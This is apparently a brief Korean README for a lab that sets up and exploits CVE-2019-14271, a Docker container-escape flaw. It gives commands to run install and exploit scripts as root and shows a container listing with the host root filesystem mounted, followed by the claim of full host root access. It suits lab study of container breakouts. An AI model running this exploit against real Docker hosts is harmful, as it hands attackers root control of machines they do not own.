
환경 구축 및 악용을 위한 편리하고 시간을 절약해 주는 자동 스크립트입니다.
환경을 구축하고 익스플로잇하기 위한 편리하고 시간을 절약해 주는 자동 스크립트입니다.
https://github.com/Metarget/metarget
https://github.com/Metarget/metarget/tree/master/writeups_cnv/docker-cve-2019-14271
https://github.com/thomasyang1207/Exploits/tree/master/CVE_2019_14271
chmod 777 Exploit.sh
chmod 777 Install_env.sh
sudo ./Install_env.sh
sudo ./Exploit.sh
이미지가 이미 빌드된 경우, 재사용 시
Exploit.sh만 실행하면 됩니다.
이제 컨테이너 cve-14271에 진입했으며 다음 화면이 표시됩니다:
root@d9b5a334a0e9:/# ls
bin breakout home lib32 logs opt run sys var
boot dev host_fs lib64 media proc sbin tmp
break_logs etc lib libx32 mnt root srv usr
host_fs에 들어가면 호스트의 루트 디렉터리가 여기에 마운트되어 있음을 확인할 수 있으며, 성공적으로 탈출한 것입니다. 호스트 머신에서 루트 사용자로 동작할 수 있습니다.